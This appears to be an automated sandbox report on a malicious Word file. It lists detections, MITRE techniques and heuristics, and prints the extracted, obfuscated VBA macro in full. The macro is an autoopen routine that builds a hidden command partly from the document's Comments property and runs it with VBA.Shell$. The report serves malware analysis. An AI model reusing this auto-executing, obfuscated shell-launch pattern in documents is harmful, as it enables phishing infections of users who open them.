Verdict: MALICIOUS
Risk Score: 172
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic auto-exec macros, specifically an 'autoopen' marker, and is flagged for potential shell calls within its VBA code. ClamAV identifies it as 'Doc.Macro.DollarShell-6346616-0', indicating a known macro-based threat. The VBA script, though obfuscated, likely attempts to download and execute a second-stage payload, aligning with common phishing attachment tactics.
Heuristics (7)

- ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
    FsMfdeePsz = "frabbBen" + "DHPkFerh" + "ZNMYEWx" + "acEnbgsFfK" + "wdvzRarzwgC" + "UpKBMNnUBY" + YgeMyYHcgZG = "aBCEvkuAv" + "XtmmTvchW" + "nrekgXr" + "bxtryDznXYX" + "RemLEaA" + "ELRzctS" + ZuHtPXfTxb = "vGsNURs" + "bzMGwYwS" + "xebgfKdxZt" + "BvfbhFgbAwD" + "yUfsmgmkkbV" + "LZenkErK" + VFNpZccSK = "axfdePUp" + "saUTzVXg" + "WuGxPzzA" + "ybMMrZx" + "ZuCApZyGDL" + "seZXfMR" + dhzSNgaH = "ZrMbxkUVuS" + "AVHtGMv" + "tYfCMhNBwKS" + "ZurnhyvnfZg" + "UeZFWEgCUrd" + "TvUMcvG" + "csaPNbufxF"
    VBA.Shell$ "" + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + nKNcxZa + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + LDhsWVdnt, 0
    gXcNPCEgawe = "NLHhpncnTrG" + "STLevWy" + "NARfANuMY" + "hGHRFDBTHRu" + "ffZmSCtZfTd" + "pUydWUWzu" + xKdEYSTxZU = "STBZHgm" + "tXAABwkXe" + "ruuSzraSStn" + "PSxfsEhXTX" + "YLNrLGZ" + "kKXkBTuRddN" + htYnmBfr = "HMmhnBWYP" + "kufprvAP" + "ktZuMgLLhLk" + "yaLRdfREr" + "PYtXfrUm" + "XKBFUwprTaW" + "HnKPtZYwyu"
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
    Attribute VB_Name = "Module1"
    Sub autoopen()
    YDbpVTtPp
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5632 bytes |

SHA-256: a7560b90135ed0bf19fd10755ebe2033965f2230bb0301abd73f9c79bf36d032

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 317 of 383 identifiers look randomly generated (e.g. 'ZurnhyvnfZg') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
YDbpVTtPp
End Sub
Function YDbpVTtPp()
NZuKkfss = "FDLHxAyZS" + "xNmBHfMfb" + "LvLCHMe" + "tSXFSkss" + "AvvRRhAZ" + "VUFsaPgt" + erbNhtWRk = "yAUNbXApm" + "TumsWYB" + "zxkwvuZU" + "UwHXVYWA" + "ThUxyauAMkt" + "tYLNUcH" + AypwFdvp = "ycuWSYMA" + "nAkgxZS" + "PuYCHpEp" + "gLrTBUZ" + "NdtfZcPWCD" + "xyxVmFUzLGs" + GeTYbWd = "yRapeEgSCds" + "NaaANbe" + "VGKbggv" + "cKYrWsKpGd" + "zABLrTUy" + "CwcEnkU" + aKrRtkvZ = "BtzYScpW" + "fLEpsas" + "ZVtKMgVbs" + "sUuybceCcs" + "UcKeKdxR" + "czEMffcrUM" + "CUkgeYcT"
nYNKpNtHtMA = "LXcxmRte" + "tCGKpxa" + "aGNsDMttCAx" + "GnvnHgZ" + "XkCMgwx" + "gVEGkKmG" + CXVytvNds = "gnutCbn" + "aYCzfhaP" + "ETXYwfNRvu" + "zaeNvXst" + "kANUaRVxT" + "BfLPydz" + "kxMaTuLkw"
ZhrFUuLn = "CyCLWLcBgyz" + "PexzANhtBaF" + "ZUrxuhMTR" + "BtVAFudrew" + "ADUkxUKB" + "GdvdcdbyE" + tVZnDZUEnfD = "FWCYyfmm" + "RGDZMvZkGW" + "xAnKNNT" + "pFkcwLyuhBB" + "CvAdcwY" + "HGNKCandLFK" + FYMdmEy = "kemDdFrunCf" + "gfbDGYz" + "rKGbsLKny" + "kTZpgPcELX" + "TRASKNKH" + "kRWAVdRStKe" + xZKnLACNgen = "ZYUTNDnT" + "LpkftVN" + "ybzpThZc" + "YnYEHMvwBaG" + "KaHeKyWV" + "pSPWVdVZhG" + UzrFTZmu = "sUERNmXbBET" + "BhTxWwu" + "VavstzN" + "CshwcRzv" + "yNxhwsxfVhX" + "sdFBdzw" + "fxMetcLhcE"
rftXDAXXbbn = "FbVPpUHFK" + "LKFaLDNEKYR" + "zmeBAMEdGFA" + "VAvPSMdAkEy" + "MnXyPWb" + "SwUPyTX" + WgCVxfLxcz = "neSKcPfzar" + "YnPazkw" + "LnCrdvTTHM" + "wBgAWUNL" + "ZhPMsNm" + "BeTHFuBA" + kfWvGgU = "vaAGFcThbMu" + "fstWrypv" + "UzusRTGNZA" + "uhmFGZnMKk" + "yfVPsraYth" + "dLpLYgXgS" + LfCUZLfK = "dxNsypHSBsH" + "XaVcYts" + "XZSVWCg" + "UndtmrKyFTa" + "caTLVCMX" + "smpYNzv" + yRKmSKMWB = "HLWFTNtbBV" + "pktbEcVR" + "CBUMvmSy" + "ceXspUBrX" + "cXFNxSdY" + "DWWvDwdNdvN" + "TXaubdbda"
TKEbuZWBh = "ccUBCHLBxTg" + "hcNRyHeK" + "RKeXCYXh" + "hzudtedWFXy" + "UAWDmfmE" + "eHUVyMugf" + TTnhZWZKN = "NCywbXfAX" + "dVpsunYz" + "FLkazCgafn" + "CRDsPZzHBzH" + "MBTszceEVf" + "cXauVKCcrfS" + NwmKRzFgCHd = "mWETPkHhp" + "PYbABPzBUgh" + "wfMxUmP" + "yxwARwUFYFS" + "vZmukfwND" + "DUSXfdEvZMc" + "bfERshZepS"
nKNcxZa = "pO" + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + ActiveDocument.BuiltInDocumentProperties("Co" + "mm" + "ents") + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + ZsEXCYNaZNE
RaGWXpkMnk = "aBrfyRadUx" + "KnnXpbUgEB" + "rEDVBURHSzP" + "DatgwybaUZw" + "FDBPuMRSXYe" + "gABfVESGzFV" + MaEcDtL = "adDxxWb" + "HpNdfWSNMHd" + "TYgTLfn" + "UHnPSEVvZrh" + "uShtTRvW" + "CBgLzxfcsM" + ueEyVNyX = "DsEHkYhL" + "YaHXrCYM" + "zpAYLfDr" + "nfAGztyr" + "KuMWzhTdmTS" + "yuNbHfMkv" + LDhGDanhGL = "VauGsdK" + "bSTSmVfhx" + "ZtTefEhA" + "hfLaHvkUZdu" + "SxeKWsw" + "xmpCwLh" + xFXtxGh = "rnLsFHuZg" + "gWDDSvSvW" + "tkaWcKZMCB" + "TVRpvcba" + "mgTuhFnSGT" + "rnnrTyBwPX" + "UGkeVBGBsn"
saUzHxeu = "YHEcRNg" + "dyAdFanXwe" + "FavnLUg" + "yusSfTS" + "FvKWnDYggR" + "WgSNDKNRH" + NRXsynbc = "kTRkDKKu" + "UygKdakZh" + "khLPTXACmU" + "crmKnPAHXsb" + "kcRTMPU" + "XdUCTpa" + swweMSWw = "HhraZhduB" + "LXCunhvK" + "GMDHFsYU" + "RtrfSKwD" + "MsgGfLxDS" + "TZVMtgXAvND" + "WVNwCtTN"
VvMVPwmV = "sAgKrVLr" + "PkmFUpn" + "ZKcVskw" + "SLKauCckN" + "frcPEGy" + "dxGSvLunw" + dPaGkaZ = "fNmYecbRYEC" + "DTXFuRUWt" + "mfzhSYT" + "caVGWaP" + "MzprwzMrgp" + "BpceXBxa" + eAFhKDg = "axLaLdzx" + "KnEMPWLTcX" + "vspGhhsmF" + "wdXCvcnw" + "ynFuFPeF" + "tKPVZmHRf" + "tGdYgmNspN"
FsMfdeePsz = "frabbBen" + "DHPkFerh" + "ZNMYEWx" + "acEnbgsFfK" + "wdvzRarzwgC" + "UpKBMNnUBY" + YgeMyYHcgZG = "aBCEvkuAv" + "XtmmTvchW" + "nrekgXr" + "bxtryDznXYX" + "RemLEaA" + "ELRzctS" + ZuHtPXfTxb = "vGsNURs" + "bzMGwYwS" + "xebgfKdxZt" + "BvfbhFgbAwD" + "yUfsmgmkkbV" + "LZenkErK" + VFNpZccSK = "axfdePUp" + "saUTzVXg" + "WuGxPzzA" + "ybMMrZx" + "ZuCApZyGDL" + "seZXfMR" + dhzSNgaH = "ZrMbxkUVuS" + "AVHtGMv" + "tYfCMhNBwKS" + "ZurnhyvnfZg" + "UeZFWEgCUrd" + "TvUMcvG" + "csaPNbufxF"
VBA.Shell$ "" + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + nKNcxZa + cauPxXZaG + Lygwpkgtn + mUysEkYL + TBmAPrbUukg + TbnwgGXK + cAFzcdA + LDhsWVdnt, 0
gXcNPCEgawe = "NLHhpncnTrG" + "STLevWy" + "NARfANuMY" + "hGHRFDBTHRu" + "ffZmSCtZfTd" + "pUydWUWzu" + xKdEYSTxZU = "STBZHgm" + "tXAABwkXe" + "ruuSzraSStn" + "PSxfsEhXTX" + "YLNrLGZ" + "kKXkBTuRddN" + htYnmBfr = "HMmhnBWYP" + "kufprvAP" + "ktZuMgLLhLk" + "yaLRdfREr" + "PYtXfrUm" + "XKBFUwprTaW" + "HnKPtZYwyu"
nEDVBaN = "SyWzrumMN" + "GpgrahxG" + "wgXDzPfP" + "NutuPXk" + "SyUyxMxcNKS" + "BmLAsZfKR" + fGsLKbBXk = "WKzMHgNeG" + "YAghycMz" + "gLWCtyM" + "xCfrGfh" + "HfDFsBF" + "MEZLEnMkec" + DtmUFZBY = "WrwtrpTk" + "VbBzSxaFvKp" + "GUmYuSK" + "wfaKPGGb" + "fCEAArrpzcU" + "tbkzrVKR" + "yUhbYDGLEty"
YHmAvkFAL = "xKhcywADU" + "fZANmVZdF" + "hvhvLksXm" + "TeVZhrEcXcb" + "bXcvNvBDXdm" + "XWaYdzpuwr" + GEDgzVEk = "TaXpnyV" + "EYNfYnH" + "dESmVEwvDd" + "PsnkMgk" + "rAAhsasY" + "tBvENxRpFD" + FVkBePC = "URTzByTcpdF" + "VGZaHsM" + "tYzrNXzdMD" + "yZmfcENd" + "kzvPMZwswK" + "bMMGmXcUt" + "YcUZYKfXA"
fBhpggHRWza = "WzsMKyDedct" + "CxTELaYDMMS" + "wALfFruE" + "KtcMRekvN" + "CBCyVSATrtS" + "aZAkTGUX" + FYeWekfbz = "BhzRzEE" + "nYtCVzXEZ" + "VTxuPyg" + "MTkyaaw" + "uYrupFe" + "vTZtVva" + CmRXDyyWHZf = "wDVEbBeZpU" + "vbPhvusXUyx" + "YDCsmDC" + "RAPgedZ" + "DdPMCaMXSv" + "VCTDhtnLKf" + sdFtZBvHe = "yAeawywRm" + "XSzxFxdAmFR" + "CReCBBGSZMf" + "cfdhbFU" + "BayumMA" + "XuNtnHGUAZ" + "pbbCBhzEm"
End Function